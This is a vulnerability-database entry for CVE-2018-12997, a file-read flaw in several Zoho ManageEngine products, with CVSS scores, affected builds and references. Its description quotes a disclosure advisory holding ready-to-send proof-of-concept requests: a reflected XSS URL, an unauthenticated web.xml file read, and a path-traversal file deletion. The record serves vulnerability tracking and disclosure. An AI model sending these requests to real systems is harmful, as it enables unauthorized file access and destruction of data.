Sign-up

ID

VAR-201806-1163


CVE

CVE-2018-12997


TITLE

plural Zoho ManageEngine Information disclosure vulnerability in products

Trust: 0.8

sources: JVNDB: JVNDB-2018-006784

DESCRIPTION

Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring. plural Zoho ManageEngine The product contains an information disclosure vulnerability.Information may be obtained. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. FailOverHelperServlet in many ZOHO products has an access control error vulnerability. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html ========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me ========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. ========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ========================== POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue

Trust: 1.8

sources: NVD: CVE-2018-12997 // JVNDB: JVNDB-2018-006784 // VULHUB: VHN-123012 // PACKETSTORM: 148635

AFFECTED PRODUCTS

vendor:zohocorpmodel:firewall analyzerscope:eqversion: -

Trust: 1.6

vendor:zohocorpmodel:manageengine netflow analyzerscope:eqversion: -

Trust: 1.6

vendor:zohocorpmodel:manageengine network configuration managerscope:eqversion: -

Trust: 1.0

vendor:zohocorpmodel:manageengine oputilsscope:eqversion: -

Trust: 1.0

vendor:zohocorpmodel:manageengine opmanagerscope:eqversion: -

Trust: 1.0

vendor:zohomodel:manageengine firewall analyzerscope:ltversion:build 123147

Trust: 0.8

vendor:zohomodel:manageengine netflow analyzerscope:ltversion:build 123137

Trust: 0.8

vendor:zohomodel:manageengine network configuration managerscope:ltversion:build 123128

Trust: 0.8

vendor:zohomodel:manageengine opmanagerscope:ltversion:build 123148

Trust: 0.8

vendor:zohomodel:manageengine oputilsscope:ltversion:build 123161

Trust: 0.8

vendor:zohocorpmodel:network configuration managerscope:eqversion: -

Trust: 0.6

vendor:zohocorpmodel:oputilsscope:eqversion: -

Trust: 0.6

vendor:zohocorpmodel:opmanagerscope:eqversion: -

Trust: 0.6

sources: JVNDB: JVNDB-2018-006784 // CNNVD: CNNVD-201807-037 // NVD: CVE-2018-12997

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-12997
value: HIGH

Trust: 1.0

NVD: CVE-2018-12997
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201807-037
value: HIGH

Trust: 0.6

VULHUB: VHN-123012
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-12997
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-123012
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-12997
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2018-12997
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: VULHUB: VHN-123012 // JVNDB: JVNDB-2018-006784 // CNNVD: CNNVD-201807-037 // NVD: CVE-2018-12997

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.9

sources: VULHUB: VHN-123012 // JVNDB: JVNDB-2018-006784 // NVD: CVE-2018-12997

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201807-037

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201807-037

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2018-006784

PATCH
title:Top Pageurl:https://www.manageengine.com/
Trust: 0.8
title:Multiple ZOHO Product access control error vulnerability fixesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81656
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2018-006784 // 
            
            
            
            CNNVD: CNNVD-201807-037

EXTERNAL IDS
db:NVDid:CVE-2018-12997
Trust: 2.6
db:CNNVDid:CNNVD-201807-037
Trust: 2.3
db:PACKETSTORMid:148635
Trust: 1.8
db:JVNDBid:JVNDB-2018-006784
Trust: 0.8
db:VULHUBid:VHN-123012
Trust: 0.1
sources:
            
            
            VULHUB: VHN-123012 // 
            
            
            
            JVNDB: JVNDB-2018-006784 // 
            
            
            
            PACKETSTORM: 148635 // 
            
            
            
            CNNVD: CNNVD-201807-037 // 
            
            
            
            NVD: CVE-2018-12997

REFERENCES
url:https://github.com/unh3x/just4cve/issues/8
Trust: 2.5
url:http://seclists.org/fulldisclosure/2018/jul/73
Trust: 1.7
url:http://packetstormsecurity.com/files/148635/zoho-manageengine-13-13790-build-xss-file-read-file-deletion.html
Trust: 1.7
url:http://www.cnnvd.org.cn/web/xxk/ldxqbyid.tag?cnnvd=cnnvd-201807-037
Trust: 1.7
url:https://nvd.nist.gov/vuln/detail/cve-2018-12997
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12997
Trust: 0.8
url:https://nvd.nist.gov/vuln/detail/cve-2018-12999
Trust: 0.1
url:https://www.manageengine.com/products/applications_manager/issues.html
Trust: 0.1
url:http://opmanager.helpdocsonline.com/read-me
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-12996
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2018-12998
Trust: 0.1
sources:
            
            
            VULHUB: VHN-123012 // 
            
            
            
            JVNDB: JVNDB-2018-006784 // 
            
            
            
            PACKETSTORM: 148635 // 
            
            
            
            CNNVD: CNNVD-201807-037 // 
            
            
            
            NVD: CVE-2018-12997

CREDITS
Xiaotian Wang
Trust: 0.1
sources:
            
            
            PACKETSTORM: 148635

SOURCES
db:VULHUBid:VHN-123012
db:JVNDBid:JVNDB-2018-006784
db:PACKETSTORMid:148635
db:CNNVDid:CNNVD-201807-037
db:NVDid:CVE-2018-12997

LAST UPDATE DATE
2024-08-14T14:12:51.054000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-123012date:2018-08-20T00:00:00
db:JVNDBid:JVNDB-2018-006784date:2018-08-31T00:00:00
db:CNNVDid:CNNVD-201807-037date:2021-09-01T00:00:00
db:NVDid:CVE-2018-12997date:2023-12-07T20:06:40.657

SOURCES RELEASE DATE
db:VULHUBid:VHN-123012date:2018-06-29T00:00:00
db:JVNDBid:JVNDB-2018-006784date:2018-08-31T00:00:00
db:PACKETSTORMid:148635date:2018-07-22T17:22:56
db:CNNVDid:CNNVD-201807-037date:2018-07-02T00:00:00
db:NVDid:CVE-2018-12997date:2018-06-29T12:29:00.437